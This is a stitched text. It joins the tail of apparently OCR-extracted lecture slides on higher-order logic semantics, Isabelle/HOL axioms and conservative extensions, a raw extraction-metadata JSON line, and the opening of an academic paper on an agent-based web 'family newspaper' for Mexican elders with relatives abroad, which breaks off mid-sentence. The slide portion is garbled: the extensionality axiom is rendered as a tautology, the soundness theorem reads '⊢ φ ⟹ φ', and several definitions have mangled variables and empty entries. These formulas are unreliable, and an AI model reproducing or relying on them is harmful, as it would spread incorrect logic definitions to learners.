\mathcal{J}(\text{True}) = T \) and \( \mathcal{J}(\text{False}) = F \) - \( \mathcal{J}(=_{\alpha = \alpha = \text{bool}}) \) is the identity on \( \mathcal{D}_\alpha \) - \( \mathcal{J}(\Rightarrow_{\text{bool} = \text{bool} = \text{bool}}) \) denotes the implication function over \( \mathcal{D}_{\text{bool}} \), i.e., \[ b \Rightarrow b' = \begin{cases} F & \text{if } b = T \text{ and } b' = F \\ T & \text{otherwise} \end{cases} \] Interpretations (2) - If $M$ is a general model and $\phi$ is a valid formula, then $\phi$ is valid in every general model $M$. Remark We have to make sure that - the interpretations of the constants are elements of the frame - all definable functions are elements of the frame Generalized models Definition (Generalized models) An interpretation $\mathcal{M} = \langle (D_\alpha)_{\alpha \in \mathbb{N}}, J \rangle$ is a (general) model for HOL if there is a binary function $V^\mathcal{M}$ such that for all type-indexed families of variable assignments $\rho = (\rho_\alpha)_{\alpha \in \mathbb{N}}$: (a) $V^\mathcal{M}(\rho, x_0) = \rho_0(x_0)$ (b) $V^\mathcal{M}(\rho, c) = J(c)$, for constants $c$ (c) $V^\mathcal{M}(\rho, s_{\alpha\beta} a_0) = \beta(V^\mathcal{M}(\rho, s) V^\mathcal{M}(\rho, t))$ i.e., the value of the function $V^\mathcal{M}(\rho, s)$ at the argument $V^\mathcal{M}(\rho, t)$ (d) $V^\mathcal{M}(\lambda x_0. t_0) = \text{“the function from } D_\alpha \text{ into } D_\beta \text{ whose value for each } z \in D_\beta \text{ is } V^\mathcal{M}(\rho[x \leftarrow z], t)"$ - If $t$ is a term of type $\alpha$, then $V^\mathcal{M}(\rho, t) \in D_\alpha$. Generalized Models - Facts (1) - If $\mathcal{M}$ is a general model and $\rho$ a variable assignment, then $V^\mathcal{M}(\rho, t)$ is uniquely determined, for every term $t$. $V^\mathcal{M}(\rho, t)$ is the value of $t$ in $\mathcal{M}$ w.r.t. $\rho$. - Gives rise to the standard notion of satisfiability/validity: - We write $V^\mathcal{M}, \rho \models \phi$ for $V^\mathcal{M}(\rho, \phi) = T$. - $\phi$ is satisfiable in $\mathcal{M}$ if $V^\mathcal{M}, \rho \models \phi$ for some variable assignment $\rho$. - $\phi$ is valid in $\mathcal{M}$ if $V^\mathcal{M}, \rho \models \phi$, for every variable assignment $\rho$. - $\phi$ is valid (in the general sense) if $\phi$ is valid in every general model $\mathcal{M}$. Generalized Models - Facts (2) - Not all interpretations are general models. - Closure conditions guarantee that every well-formed term has a value under every assignment, e.g., - closure under functions: identity function from $D_\alpha$ to $D_\alpha$ must belong to $D_{\alpha\alpha}$ so that $V^\mathcal{M}(\rho, \lambda x_0. x)$ is defined. - closure under application: - if $D_N$ is set of natural numbers and - $D_{N\alpha\beta} = N_{\alpha\beta}$ contains addition function $p$ where $p \times y = x + y$ - then $D_{N\beta\alpha}$ must contain $k x = 2x + 5$ - since $k = V^\mathcal{M}(\rho, \lambda x. f (t x y))$ where $\rho(f) = p$ and $\rho(y) = 5$. 3. Foundations of Higher-Order Logic 3.2 Foundation of HOL Standard models Definition (Standard Models:) A general model is a standard model iff for all \( \alpha, \beta \in \tau \), \( D_\alpha \Rightarrow \beta \) is the set of all functions from \( D_\alpha \) to \( D_\beta \). Remarks - A standard model is a general model, but not necessarily vice versa. - Analogous definitions for satisfiability and validity w.r.t. standard models. Isabelle/HOL We introduce HOL in Isabelle’s meta-logic: consts - True :: bool - False :: bool - Not :: bool ⇒ bool ("\neg" [40] 40) - If :: [bool, 'a, 'a] ⇒ 'a ("if _ then _ else") - The :: ('a ⇒ bool) ⇒ 'a (binder "THE" 10) - All :: ('a ⇒ bool) ⇒ bool (binder "\forall" 10) - Ex :: ('a ⇒ bool) ⇒ bool (binder "\exists" 10) - = :: [bool, bool] ⇒ bool (infix 50) - ∧ :: [bool, bool] ⇒ bool (infixr 35) - ∨ :: [bool, bool] ⇒ bool (infixr 30) - → :: [bool, bool] ⇒ bool (infixr 25) defs - True_def: True ≡ ((λ x :: bool. x) = (λ x. x)) - All_def: All(P) ≡ (P = (λ x. True)) - Ex_def: Ex(P) ≡ (∀Q. (∀x. P x) → Q) → Q - False_def: False ≡ (∀P. P) - not_def: ¬P ≡ P → False - and_def: P ∧ Q ≡ (∀R. (P → Q → R) → R) - or_def: P ∨ Q ≡ (∀R. (P → R) → (Q → R) → R) - if_def: If P y z ≡ THE z :: 'a.(P = True → z = x)∧(P = False → z = y) - subst: - refl: - ext: - impl: - mp: - iff: - True_or_False: - the_eq_trivial: The axioms and rules of HOL axioms/rules - refl: "t = t" - subst: "⟦ s = t ; P(s) ⟧ " ⟹ P(t)" - ext: "(\forall x. f\ x = g\ x) \implies (\forall x. f\ x = g\ x)" - impl: "(P \implies Q) \implies P \implies Q" - mp: "⟦ P \implies Q ; P ⟧ " \implies Q" - iff: "(P \implies Q) \implies (Q \implies P) \implies (P = Q)" - True_or_False: "(P = True) ∨ (P = False)" - the_eq_trivial: "(THE x. x = b) = (b :: 'a)" The axioms and rules of HOL (2) Additionally, there is: - universal $\alpha, \beta$, and $\eta$ congruence on terms (implicitly), - the axiom of infinity, and - the axiom of choice (Hilbert operator). - This is the entire basis! Properties of HOL Theorem 1 (Soundness of HOL) HOL is sound: $$\vdash \phi \implies \phi$$ is valid in the general/standard sense Theorem 2 (Incompleteness of HOL) HOL is incomplete w.r.t. standard models: There exist $\phi$ that are valid in the standard sense, but $\not\vdash \phi$ Remark [And86, Chap. 5-7] presents proofs for these theorems. Note, however, that [And86] does not restrict the semantics to models where $D_{\text{ind}}$ is infinite. Basic ideas - Theories are stepwise extension of the core theory of HOL - Extensions may introduce new constants and new types - Inconsistencies are avoided by construction - Syntactical mechanisms are used to make extensions more convenient Remark Extensions only introduce names for “things” that already exist in the core theory. Conservative Extension of Theories Basic definitions Terminology and basic definitions (cf. [GordonMelham93]): **Definition (Theory)** A (syntactic) theory $T$ is a triple $(\chi, \Sigma, A)$ where - $\chi$ is a set of type names - $\Sigma$ is a set of typed function/constant names using types of $\chi$ - $A$ is a set of axioms over $\Sigma$ **Definition (Consistent)** A theory $T$ is consistent iff $False$ is not provable in $T$: $$A \not \vdash False$$ **Definition (Theory extension)** A theory $T' = (\chi', \Sigma', A')$ is an extension of a theory $T = (\chi, \Sigma, A)$ iff $$\chi \subseteq \chi' \text{ and } \Sigma \subseteq \Sigma' \text{ and } A \subseteq A'.$$ **Definition (Conservative extension)** Let $T = (\chi, \Sigma, A)$ and $Th(T) = \{ \phi \mid A \vdash \phi \}$; a theory extension $T' = (\chi', \Sigma', A')$ of $T$ is conservative iff $$Th(T) = (Th(T') \upharpoonright \Sigma)$$ where $\upharpoonright \Sigma$ restricts sets of formulas to those containing only names in $\Sigma$. **Lemma (Consistency)** If $T'$ is a conservative extension of a consistent theory $T$, then $$False \not \in Th(T')$$ Syntactic schemata for conservative extensions Not every extension is conservative: **Counterexample** Let $T = (\chi, \Sigma, A)$ such that $A$ includes the axioms of HOL and $T$ is consistent. $$T' = (\chi, \Sigma, A \cup \{ f_{\text{bool}} = \text{bool}.x = f x \})$$ is not a conservative extension of $T$. We consider conservative extensions by: - constant definitions - type definitions **Remark** Cf. [GordonMelham93] for other extension schemata Constant definitions are conservative Lemma (Constant definition) A constant definition is a conservative extension. Proof. Proof sketch: • Th(T) ⊆ (Th(T') |Σ) : from definition of Th • (Th(T') |Σ) ⊆ Th(T) : let π' be a proof for φ ∈ (Th(T') |Σ). We unfold any subterm in π' that contains c by c = E into π. π is a proof in T, i.e., φ ∈ Th(T). □ Approaching type definitions Idea - Specify a subset of the elements of an existing type \( r \) - "Copy" the subset and use the copy as value set of the new type \( t \) - Link old and new type by two functions More precisely, the definition of a new type \( t \) is based on: - an existing type \( r \) - a predicate \( S :: r \Rightarrow \text{bool} \), defining a non-empty "subset" of \( r \); - an abstraction function \( \text{Abs}_r :: r \Rightarrow t \) - a representation function \( \text{Rep}_r :: t \Rightarrow r \) - axioms stating a bijection between the set characterized by \( S \) and the new type \( t \). Remark This may seem strange: if a new type is always isomorphic to a subset of an existing type, how is this construction going to lead to a "rich" collection of types for large-scale applications? - But in fact, due to \( \text{ind} \) and \( \Rightarrow \), the types in HOL are already very rich. - Thus, extensions essentially give names to values and types that have already been "expressible" in the "old" theory. - Extensions allow to formulate theorems in a more compact and readable way. We now give two examples revealing the power of type definitions: - Typed sets - Pairs Types for sets We define the new type \( \text{natset} \) containing all sets of natural numbers: - existing type: \( (\text{nat} \Rightarrow \text{bool}) \) - predicate \( S :: (\text{nat} \Rightarrow \text{bool}) \Rightarrow \text{bool}, S \equiv \lambda f. \text{True} \) - \( \chi' = \chi \cup \{ \text{natset} \} \) - \( \Sigma' = \Sigma \cup \{ \text{Abs}_{\text{natset}} :: (\text{nat} \Rightarrow \text{bool}) \Rightarrow \text{natset}, \text{Rep}_{\text{natset}} :: \text{natset} \Rightarrow (\text{nat} \Rightarrow \text{bool}) \} \) - \( A' = A \cup \{ \forall x. \text{Abs}_{\text{natset}} (\text{Rep}_{\text{natset}} x) = x, \forall y. S \Rightarrow \text{Rep}_{\text{natset}} (\text{Abs}_{\text{natset}} y) = y \} \) - One has to prove \( T \vdash \exists x. (\lambda f. \text{True}) x \) (using Isabelle/HOL) ### Remarks on the set type **Remarks** - Isabelle/HOL allows to define a parametric type \( \alpha \text{ set} \) where \( \alpha \) is a type variable. - Functions of type \( \alpha \Rightarrow \text{bool} \) are used to represent sets, i.e., sets are represented by their characteristic function. - In \((\text{Abs}_\alpha \text{ set } f)\), the abstraction function \(\text{Abs}_\alpha \text{ set} \) can thus be read as “interpret \( f \) as a set”. - Here, sets are just an example to demonstrate type definitions. Later we study them for their own sake. ### Approaching the types for pairs **Given some types \( \alpha \) and \( \beta \). How can we represent pairs, i.e., define the type \( \alpha \times \beta \)?** **Idea:** - Existing type: \( \alpha \Rightarrow \beta \Rightarrow \text{bool} \) - Represent pairs as functions of type \( \alpha \Rightarrow \beta \Rightarrow \text{bool} \) - Use function \( \lambda x :: \alpha. \lambda y :: \beta. x = a \land y = b \) to represent the pair \((a, b)\) - It is clear that there is exactly one function for each pair. - There are also functions of type \( \alpha \Rightarrow \beta \Rightarrow \text{bool} \) that do not represent a pair, i.e., we have to define a nontrivial \( S \). ### Type definitions in Isabelle/HOL **Syntax for type definitions** ``` typedef (typevars) T' = "{x. A(x)}" ``` **Relation with explained schema:** - The new type is \( T' \) - \( r \) is the type of \( x \) (inferred) - \( S \) is \( \lambda x. A x \) - Constants \( \text{Abs}_{T'} \) and \( \text{Rep}_{T'} \) are automatically generated. ### Conservative extensions: Summary - We have presented a method to **safely** build up larger theories: - Constant definitions - Type definitions - Subtle side conditions - New types must be isomorphic to a “subset” of an existing type. - Isabelle/HOL uses these conservative extensions to - build up the theory **Main** from the core definitions of HOL (cf. Tutorials and manuals for Isabelle2011-1) - provide more convenient specialized syntax for conservative extensions (datatype, primrec, function, ...) ### Conclusions of Chap. 3 - HOL generalizes semantics of FOL - **bool** serves as type of propositions - Syntax/semantics allows for higher-order functions - Logic is rather minimal: 8 rules, more-or-less obvious - Other “logical” syntax - Rich theories via conservative extensions ### Questions 9. What is a standard model? 10. Give and explain one of the axioms of HOL? 11. Can the constants True and False be defined in HOL? 12. What does it mean that HOL+infinity is incomplete wrt. standard models? 13. What is a conservative extension? 14. What is the advantage of conservative extensions over axiomatic definitions? 15. Which syntactic schemata for conservative extensions were treated in the lecture? 16. Give examples of constant definitions. 17. Explain the definitions of new types? 18. Does a data type definition in Isabelle/HOL lead to a new type?
{"Source-Url": "https://softech.informatik.uni-kl.de/homepage/teaching/SVHOL14/Chap3_4auf1.pdf", "len_cl100k_base": 6275, "olmocr-version": "0.1.49", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 50957, "total-output-tokens": 7289, "length": "2e12", "weborganizer": {"__label__adult": 0.000560760498046875, "__label__art_design": 0.0008144378662109375, "__label__crime_law": 0.0006837844848632812, "__label__education_jobs": 0.005809783935546875, "__label__entertainment": 0.0002290010452270508, "__label__fashion_beauty": 0.0003292560577392578, "__label__finance_business": 0.0006666183471679688, "__label__food_dining": 0.0010004043579101562, "__label__games": 0.001537322998046875, "__label__hardware": 0.000934600830078125, "__label__health": 0.001399993896484375, "__label__history": 0.0007357597351074219, "__label__home_hobbies": 0.00037169456481933594, "__label__industrial": 0.0015611648559570312, "__label__literature": 0.0021648406982421875, "__label__politics": 0.0007677078247070312, "__label__religion": 0.0013628005981445312, "__label__science_tech": 0.444091796875, "__label__social_life": 0.0003457069396972656, "__label__software": 0.00696563720703125, "__label__software_dev": 0.525390625, "__label__sports_fitness": 0.0005316734313964844, "__label__transportation": 0.0013256072998046875, "__label__travel": 0.00028324127197265625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20862, 0.00722]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20862, 0.70268]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20862, 0.72196]], "google_gemma-3-12b-it_contains_pii": [[0, 253, false], [253, 2195, null], [2195, 3821, null], [3821, 5618, null], [5618, 8459, null], [8459, 11070, null], [11070, 12837, null], [12837, 13903, null], [13903, 15474, null], [15474, 15827, null], [15827, 17873, null], [17873, 19468, null], [19468, 20862, null]], "google_gemma-3-12b-it_is_public_document": [[0, 253, true], [253, 2195, null], [2195, 3821, null], [3821, 5618, null], [5618, 8459, null], [8459, 11070, null], [11070, 12837, null], [12837, 13903, null], [13903, 15474, null], [15474, 15827, null], [15827, 17873, null], [17873, 19468, null], [19468, 20862, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20862, null]], "pdf_page_numbers": [[0, 253, 1], [253, 2195, 2], [2195, 3821, 3], [3821, 5618, 4], [5618, 8459, 5], [8459, 11070, 6], [11070, 12837, 7], [12837, 13903, 8], [13903, 15474, 9], [15474, 15827, 10], [15827, 17873, 11], [17873, 19468, 12], [19468, 20862, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20862, 0.0]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
329d53e3ad57edf36bbf5319ab51976e0676509b
A Web-Based System to Facilitate Elders Communication with Their Families Living Abroad Pedro C. Santana1, Marcela D. Rodríguez2,1, Víctor M. González4, Luis A. Castro2, Ángel G. Andrade3,1, Jesús Favela2 1School of Engineering, UABC University, México 2Computer Science Depart., 3Elec. and Telecomm. Depart., CICESE Research Center, México 4Department of Informatics, University of California, Irvine, USA {psantana, marcerod, quiroa, aandrade, favela}@cicese.mx, vmgyg@ics.uci.edu Abstract The aging of the population is a phenomenon faced by most nations. Growing old is often accompanied of a loss of close companionship which has been shown may aggravate the cognitive impairment of elders. From a qualitative study, key issues emerged regarding unmet needs of elders communication that we propose to address with web-based technology. We decided to create an electronic family newspaper to incorporate elders to the current social networks created by their younger relatives who already communicate through Internet applications, such as IM and e-mail. The system uses web-based technology to make it accessible from any web browser for those users living abroad. To serve the needs of elders and make the input of information easier, several autonomous agents help the user to interact with the system that can be accessed by any electronic display with a touch screen, such as a Tablet PC. 1. Introduction The aging of the population is a phenomenon faced by many nations, such as Mexico, in which 7.5% of the population is 60 years or older. It is estimated that by 2030 this figure will be more than double, reaching 17.5% [1]. Among those elders, 10% of them live alone with no close family members around them. This condition is more likely to occur in some regions of Mexico as it is related to the ever increasing migration of one or more of their relatives to the USA. The living conditions of those elders can be quite complex as they often face the impossibility of visiting or being visited by their families as they lack proper documentation (VISAS or residency permits). And even when this is not a problem, distance and cost might reduce direct contact to one visit every other year. As it has been found, lack of contact with family members and friends may have a negative impact on elder’s health, such as accelerating a cognitive decline [2, 3]. Thus, Mexican elders in this situation face particular challenges that might aggravate some of the well-known effects of living with no close companionship. Technically, the system focuses on solving two important challenges. On the one hand, the system aims to provide adequate interfaces for each of the different types of users that would use it. Elders must have an interface that is adequate for their needs. Family members must have means to use their current tools (e.g. email clients) without the need to migrate to another communication tool. On the other hand, the system enhances the interactions with family members. Based on a set of autonomous agents the system provides an enhanced level of interaction beyond synchronous and asynchronous forms. Our work aims to provide a technological solution focused on supporting the relationship between elder people living alone in Mexico and their relatives living abroad. The central concept of the proposed system is an electronic family newspaper, through which elders and their families: a) share important information, b) personal reminiscences and cultural stories c) may interact with virtual relatives; and c) occasionally may interact with the real relatives. It is thought that the electronic family newspaper will enable elders to feel more engaged and connected with their relatives living abroad as it provides richer forms of communication, and, it will facilitate their integration into the networks that currently connect members of their families who increasingly are making use of e-mail systems to keep in touch with each other and help to incorporate elders to the current social networks created by their younger relatives who already communicate through Internet applications, such as IM and e-mail. 2. Problem context: the need to be connected An initial understanding of the phenomenon of migration and the need to be connected was obtained by the analysis of the records of the websites of Alhuey (see Figure 1), San Luis de la Paz and Cihuatlán, all small towns in different parts of Mexico with a important number of people living abroad or in other big cities in Mexico. Members of these communities maintain contact with their roots through these Internet applications which enables them to share photos, stories and anecdotes. We analyzed the contents of those web sites as a departure point to understand some of the aspects involved in migrating and keeping ties to communities. A central feature of these web sites is that they let people of different ages share personal information in the form of digital photos. For instance, in Alhuey’s web site visitors can upload pictures and post comments to share with others. We found that in this site an average of 2 pictures and 6 posts are placed every single day by around 1050 users. Based on the comments posted on the web sites, we found that some of them have been absent from their native land for years. Most of them are interested in what is happening in their towns and some of them want to know what happened to their old friends. For instance, they are concerned about issues such as people getting married, people who passed away, whether some of their friends have children or not, but most of them just want to know where everybody is living. Consequently, the web site plays a major role on keeping people in touch with their social networks from their beloved town. We also noticed that several users are using these websites as communication tools to complement other tools such as e-mail or instant messaging. The sense of community facilitated by the technology, perhaps particular for small towns where everyone knows each other, provided good initial insight of what it is required by people in order to be connected in spite of distance. These results guide our initial understandings that serve to focus our inquiry over the particular situation of elders living alone. 3. Understanding elderly people Our research was then oriented towards understanding the emotional needs of Mexican elders with families living abroad. We wished to gain knowledge about the experiences of elders in regards to the following five main aspects: communication with relatives, feelings of isolation, health care, keeping up to date with things around them such as family events, and being independent. From these lines of inquiry we aimed to reveal fundamental requirements for a system supporting elders. ![Figure 1. Alhuey web site Photographs in Album.](image) 3.1. Methods Based on personal contacts and recommendations from them, we contacted a number of elders that were experiencing the scenario that we were aiming to understand. Our set of informants included people of different genders, age and living in different geographical regions of Mexico. Our interviews were semi structured and were conducted within the home environment (e.g. the kitchen) following standards and recommendations for qualitative interviews [4]. 3.2. Results The interviews were analyzed using a comparative verification of evidence which resulted in the identification of major themes for each topic of inquiry. In this section we explained some of the most relevant results. We found that the main mode of communication with relatives living abroad was the telephone which basically is used to update each other about news and recent family events. Phone calls are not always frequent and are more likely to occur at special occasions such as birthdays or holidays or when some emergency issues arise (e.g. accidents or other major problems). All our informants expressed their preference for being in constant communication with their families, but recognized that this is not always possible. One of our interviewees expressed that the impossibility of communicating on a more regular basis can bring some sadness to her. Those facts point to the relevance of providing appropriate mechanisms. to help elders feel connected to their families. We noticed that a central component that is missed whenever families get separated is the ability to share day-to-day experiences. Many times the content of communications is limited to basic information regarding the well-being of the persons, health, financial situation, or relevant events. However elders and their families have little chance to share the little things that sometimes make life enjoyable and they used to share when they were together: local events, conversations, the ability to see each other and other emotionally important facts. Our results also highlighted the importance given by elderly people to photo albums. It is a real treasure to them. An old couple commented, “Our grandchildren love to look at the album and asks us what her mother used to do when she was a kid”. Moreover, they intend to acquire a video camera to record all the visits of their relatives. This showed us that pictures are artifacts from which we could take advantage of, due to the stories and emotive load associated to them. Finally, it was interesting to find that those elders interviewed show disposition to engage in learning new things. As a way to keep them active, some of them are taking courses (e.g. English lessons). Similarly, another person is going to elementary school and is very proud of her achievements and motivated to continue her studies for as long as she can. This disposition to learn can be very relevant for the purposes of introducing any technological solution. Based on these findings and our preliminary understanding of the phenomenon, we engaged in designing a system to support the emotional ties among Mexican elders and their families living abroad, focusing on a way to enhance their communication. 4. Related work In this section we compare some alternative approaches that have been discussed within the context of providing companionship for elders. Some design concepts and products have intended to create emotional connections over a distance by applying theories of affective computing combined with ubiquitous computing technology. For instance, the Gust of Presence system provides a suitable carrier for affective communication by enabling a two-way notification of presence [5]. This system lets parents and children who live apart inform each other when they have arrived home. It uses a bowl, which senses when the user throws something into it, such as money or keys, which may indicate he has arrived at his home. Then, the bowl takes a picture from the inside and sends this information to another identical bowl located in the parent’s home. Similarly, the Lovelet [6] is a wearable communication tool for intimate people for naturally and timely conveying affection. This consists of a thermo sensor that always senses air temperature surrounding a user, the temperature data is transmitted to another user and depending on the temperature, a full color LED (Light Emitting Diode) illuminates in different color to indicate an emotional state. Although, both the Gust of Presence and the Lovelet can help to share emotional states, they are not appropriate to support communication in a more direct way and do not address directly the needs of elders. The SeniorNet [7] tool is a computer-mediated communication (CMC) tool exclusively for older adults and was used to identify a number of motivations that older adults expressed for using CMC technology. Many SeniorNet users mentioned that SeniorNet was an important way to meet people with similar interest, access information, and develop companionship and supportive relationships. Although SeniorNet seems to be in the right track attending the needs of elders, it fails to be oriented towards supporting the communication with people outside the network that include family members using other tools such as e-mail. In contrast with those systems, we aimed to create a system that provides a more comprehensive support for elders and their families. Based on our interviews we decided to focus the design of our systems to ameliorate the isolation of elders by means of digital photos and narrations accessible through a repository of information in the form of an electronic newspaper. We decided to use the metaphor of a newspaper as it is a well understood concept by both elders and young people and conveys the idea that information is provided in a frequent basis. We envisioned that through the newspaper, the elders and their family would share their emotions, anecdotes, memories, and other kind of information, such as Mexican traditions. 5. Envisioned system We envision that to ameliorate the loneliness of Mexican elders, our system needs to address the following aspects: Enable elders and their family to feel close and maintain contact in an entertaining way. We envisioned an electronic family newspaper, which enables users to share information, such as personal memories, anecdotes, or traditions that elders would like to transmit to their younger relatives, or vice versa, the family residing in USA sharing the American customs they have adopted. The information transmitted through the family newspaper, is categorized in different sections. For instance, in the Social section the family may publish photos or a video of when the granddaughter graduated from high school. The Entertainment section provides activities for elders, such as a memory game, in which the elder may play with a virtual relative. Enable an easy way for elders to use the system. We consider that for elders we need to propose an easy way to use the system based on a computer with a touch screen. The system enables elders to contribute to build the newspaper by using digital cameras, and scanners to get images of documents or printed photos they want to publish in the newspaper. Make the system accessible for the elders’ family. As most of the elders’ families already use Internet communication tools to be in contact with their relatives and friends, we should take advantage of this. Thus, with the aim of providing an easy to use system, it integrates web technology already known by the users living abroad. Elders may access and use the system in several places within the home. The family newspaper is presented in a display that can be hung on any wall of any room of the home of an elder, in which a senior spends most of his time or usually reads the conventional newspaper. To clarify how these features are addressed by our system, we constructed several scenarios of use to illustrate the system’s functionality. The creation of scenarios enabled us to generate and communicate design ideas for our system and to better understand the implications of particular design solutions [8]. Next, we present some of the use scenarios in which we envision how elders may ameliorate their loneliness through the electronic family newspaper. 5.1. Scenario 1 Mrs. and Mr. Valenzuela are old adults living alone in Guadalajara, Mexico with two daughters and a son living in Santa Ana, California, USA. While Mrs. Valenzuela is preparing breakfast, the display in the kitchen plays an alarm to notify her that there is some family news that may be interesting for her. She approaches the display and notices that there are new messages in the Cooking section. As the “5 de Mayo” Mexican holiday is coming, her daughters are organizing a dinner at the neighborhood and have published a list of potential Mexican dishes (see Figure 2) they would like to prepare for the occasion. Mrs. Valenzuela realizes that she has the recipes of some of them and decides to go for her cooking book to send them to her daughters. While Mrs. Valenzuela goes for the book, Mr. Valenzuela quickly pulls the display and reads the family newspaper while he is eating breakfast. He selects the Sports section because he is sure his son Mario has written a review of the latest soccer game of the Mexican league. As Mr. Valenzuela realizes that his son would like to read interviews of some of the players that were published in yesterday’s local newspaper, he scans the note and attaches it to the review. At that moment Mrs. Valenzuela is back with a bunch of old cooking books and asks her husband: “Do you think that they will find Tejocotes for the tea in Santa Ana?.” 5.2. Scenario 2 Mrs. Diana is a 72 years old woman who lives alone in Tijuana, Mexico. She likes to play with the memory game included in the Entertainment section of her family newspaper. When she selects the memory game to start to play, a set of images of her family residing in the USA and other places of Mexico is presented at the top of the screen. As she misses her grandson Jose, she decides to play this session with him. For this, she selects the photograph of Jose and the virtual Jose appears saying hello and the memory game, which includes only images of the latest events related to her grandson. When Diana matches a first pair of cards, the virtual Jose, explains a little bit of the event in the picture. While Mrs. Diana and the virtual Jose are playing, her grandson is doing his homework on his computer. He realizes that his grandmother is playing and decides to join the game. The grandmother is glad of playing with her grandson. 6. System design In order to achieve the system functionality we are proposing an agent-based system which architecture is described next. 6.1. Dual interfaces The system was designed to provide an interface for elders and another interface for family members. To serve the needs of elders and make the input of information easier, the system is based on Tablet PC technology. By using a pen to touch the screen, elders can access the functionality and input information. In addition, Family members can use the system through any other device with a web browser. We believe that this would help the seamless adoption of the system. 6.2. System Architecture As illustrated in Figure 3, the architecture of the electronic family newspaper consists of several layers. Codice CMS. The system includes a Weblog Content Management System named Codice in which a weblog is created by the family members to load the information they want to publish in the family newspaper through the Codice Web Services APIs. A weblog is a term used to refer to a webpage that has frequent postings made to it by the person who created the page and others who are given rights to access the page. The trend of using weblogs is gaining momentum with the introduction of automated publishing tools that facilitate the publishing process and improve the user experience and usability; Codice was built on AJAX (Asynchronous JavaScript + XML). Ajax incorporates standards-based presentation (XHTML and CSS), dynamic display and interaction (Document Object Model), data interchange and manipulation (XML and XSLT), asynchronous data retrieval (XMLHttpRequest) and JavaScript binding everything together [9]. The Ajax engine, allows the user’s interaction with Codice to happen asynchronously. ![Figure 3. The Family Newspaper architecture.](image) Codice Web services API. To implement our system we are using the Service-Oriented Computing (SOC) paradigm that utilizes services as fundamental elements for developing applications [10]. A service is an application that exposes its functionality through an application programming interface (API). A Web resource is any type of named information object that is accessible through the Web. Therefore a Web service possesses the characteristics of both a Web resource and a service. It is an application that exposes its functionality through an API, and it is a Web resource that is designed to be consumed by software rather than by a human sitting at a browser [11]. Because services provide an uniform and ubiquitous information distributor for a wide range of computing devices (such a Tablet PCs, PDAs, cellular telephones, or appliances) and software platforms (e.g., LINUX or Windows), we based our architecture on a Web service API layer in order to interact with Codice CMS programmatically. **Elder’s Client.** This layer is the subsystem that enables elders to create and interact with the electronic family newspaper. The main components of this layer were identified as agents since they have attributes that enabled us to cope with the desirable system feature of facilitating the elder interaction with the system. The metaphor used is that of a personal assistant [12] who seamlessly collaborates with the elder in the same work environment. In this case, autonomous agents proactively help elders to perform difficult tasks, such as using the scanner to publish information on the newspaper, represent the relatives when they are not connected to the system, and to communicate with their relatives. We proposed that autonomous agents not only represent the users living abroad, but may act as proxies to the system’s devices (such as Tablet PC, digital cameras or scanners). Through a Tablet PC, elders can navigate the electronic newspaper and introduce some commands by touching the screen. The system also displays a keyboard so that seniors can easily introduce some text, such as to provide a brief description of a picture. Thus, at the elder’s home the Tablet PC can be located in any place where they would like to read the family newspaper. The Tablet PC acts as a server for the system’s agents that enable elders to visualize the family newspaper or update it. **Relative’s Client.** Like the elder’s client, the main components of this layer were identified as agents, since they have attributes that enabled us to cope with the desirable system feature of facilitating the interaction with the system. The electronic family newspaper can be accessed by the elder’s relative from any computer with a web browser. **Family Newspaper Agents.** This layer allows the agents to turn the web services into proactive entities working as peers to serve the elders or their relatives, representing it in the system, composing dynamically the family newspaper. The next section describes the functionality provided by these agents. 6.3. System Agents Envisioning our technological solution as a multi-agent systems enabled us to implement a scalable and loosely-coupled system in which by means of autonomous agents we can add new functionality to the system (i.e. new games), integrate new devices (i.e. video cameras) and other people with whom the user may want to be connected, such as close family friends. The main system's agents (see figure 4) are described next: The Newspaper Agent: This agent is aware of new entries in the Codice weblog to build or update the newspaper. To monitor and collect the weblog changes, the newspaper agent was built as content a syndication reader powered by the RSS (RDF Site Summary – formerly called Rich Site Summary) standard which is an application of the eXtensible Markup Language (XML) that adheres to the World Wide Web Consortium’s Resource Description Framework (RDF) and is a method of describing news or other Web content that is available for syndication or distribution from an online publisher [13], in this case it is accessible through the Codice APIs, which generate XML when a change occurs in the family newspaper. Weblog agent: It acts as a proxy to the Codice’s APIs by enabling users to post information into the Weblog. This agent receives information directly from the elder’s relatives or from the agents that help elders to contribute to the family newspaper (see figure 5), such as the Scanner Agent. Display agent: It is a proxy to the display. It has control of what and when the information is presented in the Tablet PC. For instance, when the display agent is notified that a new entry in the newspaper is available, it automatically opens the family newspaper application. Scanner Agent: The images and text provided by the elder can be loaded through a scanner. For this, the system provides an agent acting as a proxy to these devices. When the elder scans a document or picture, the Scanner Agent sends the image to the weblog Agent in order to be posted on the weblog and then added to the family newspaper. Memory Game Agent: When the elder joins the Entertainment section, he or she is presented with several activities, such as the Memory Game. The Memory Game Agent is a server application that monitors the movements of the players, and validates them. It also maintains a database with images and a brief story describing them. If the elder chooses to play, this agent will generate a set of cards with the images posted in the weblog, as illustrated in Figure 6. **Virtual Player Agent:** This is a companionship agent. If the elder chooses to play the memory game with one of his relatives, the memory game agent will generate a set of cards containing images related with that particular person. Both, the elder and the virtual player agent will make alternate movements. When a pair of cards is matched, the Virtual Player Agent will display a brief 